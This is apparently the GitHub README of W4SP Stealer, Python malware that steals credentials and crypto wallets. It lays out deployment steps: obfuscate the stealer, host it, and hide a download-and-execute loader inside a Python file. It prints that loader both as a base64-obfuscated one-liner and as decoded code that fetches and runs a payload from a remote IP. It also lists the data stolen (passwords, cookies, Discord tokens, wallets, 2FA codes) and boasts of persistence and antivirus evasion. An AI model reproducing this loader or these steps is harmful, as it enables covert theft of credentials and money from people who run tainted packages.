loTus04/W4SP-Stealer

w4sp Stealer official source code, one of the best python stealer on the web

🐝 W4SP Stealer 🐝

w4sp Stealer official source code, one of the best python stealer on the web

By @loTus04 and @billythegoat356
(education purpose only)

Setup [Stealer]

1.1 put ur webhook in wasp.py
1.2 obfuscate it
1.3 upload it (must be accecible from a web browser)

2.1 put the wasp.py raw link in injector.py
2.2 obfuscate it
2.3 upload it (must be accecible from a web browser)

3.1 Make a little script that downloads + run injector
3.2 Hide this script in a python file

Our example:

[one liner]

__import__('builtins').exec(__import__('builtins').compile(__import__('base64').b64decode("ZnJvbSB0ZW1wZmlsZSBpbXBvcnQgTmFtZWRUZW1wb3JhcnlGaWxlIGFzIF9mZmlsZQpmcm9tIHN5cyBpbXBvcnQgZXhlY3V0YWJsZSBhcyBfZWV4ZWN1dGFibGUKZnJvbSBvcyBpbXBvcnQgc3lzdGVtIGFzIF9zc3lzdGVtCl90dG1wID0gX2ZmaWxlKGRlbGV0ZT1GYWxzZSkKX3R0bXAud3JpdGUoYiIiImZyb20gdXJsbGliLnJlcXVlc3QgaW1wb3J0IHVybG9wZW4gYXMgX3V1cmxvcGVuO2V4ZWMoX3V1cmxvcGVuKCdodHRwOi8vMTMuMzcuMTMuMzc6MTMzNy9pbmplY3QvVXdVJykucmVhZCgpKSIiIikKX3R0bXAuY2xvc2UoKQp0cnk6IF9zc3lzdGVtKGYic3RhcnQge19lZXhlY3V0YWJsZS5yZXBsYWNlKCcuZXhlJywgJ3cuZXhlJyl9IHtfdHRtcC5uYW1lfSIpCmV4Y2VwdDogcGFzcw"),'<string>','exec'))

[script]

from tempfile import NamedTemporaryFile as _ffile
from sys import executable as _eexecutable
from os import system as _ssystem
_ttmp = _ffile(delete=False)
_ttmp.write(b"""from urllib.request import urlopen as _uurlopen;exec(_uurlopen('http://13.37.13.37:1337/inject/injector.uwu').read())""")
_ttmp.close()
try: _ssystem(f"start {_eexecutable.replace('.exe', 'w.exe')} {_ttmp.name}")
except: pass

if you still don't manage to use wasp, ur just stupid, plz don't dm me

Setup [API] (api by @billythegoat356)

2022-11-20.22-25-35.mp4

Features [Stealer]

Global

• Saved Passwords
• Browser Cookies
• Get PC information
• AntiVM - Trust Factor system, it wont send data if Gmail cookies arent' found
• Data is send throught a Discord webhook
• All files are uploaded to gofile.io to prevent discord rate-limite (ty @sfx2me for the upload function)

Discord

• Discord Tokens from browsers
• Discord Token from discord, discordcanary, discordPTBa
• Get all info on token (email, nitro/badge, rare friends)

Wallets

• Exodus Wallet
• Metamask Wallet
• Atomic Wallet

Gaming

• Steam Client
• Riot Client
• NationsGlory Client

Other

• Telegram Session

File Stealer

• It will search throught the pc for: saved passwords, 2fa codes, wallet keys and other sensitive information
  (idea came from Kiwi plugin on msf)

Features [Injector]

• brilliant persistance technique
• Invisible in TaskManger StartUP tab
• FUD
• Fully runs in background
• Hides the stealer very well

Few articles on W4SP (those where writen during beta-testing)

• securelist.com ~ Two more malicious Python packages in the PyPI
• securityweek.com ~ Security Firms Find Over 20 Malicious PyPI Packages Designed for Data Theft
• digismak.com ~ Criminals steal data by spoofing popular open source package
• darkreading.com ~ Whack-a-Mole: More Malicious PyPI Packages Spring Up Targeting Discord, Roblox

Features [API] (api by @billythegoat356)

• Easy2use API, can be controled using anything, default is our discord bot, but you can use a telegram bot or what ever u want
• manage webhooks
• manage licence
• manger users
• Auto & Custom Obfuscation (using Hyperion rn)
• BAIT security (if a browser is detected, it will return a fake obfusacted script lmaoo) - idea by @lath
• Full customisable, can be use with any Stealer or Obfusaction

ScreenShots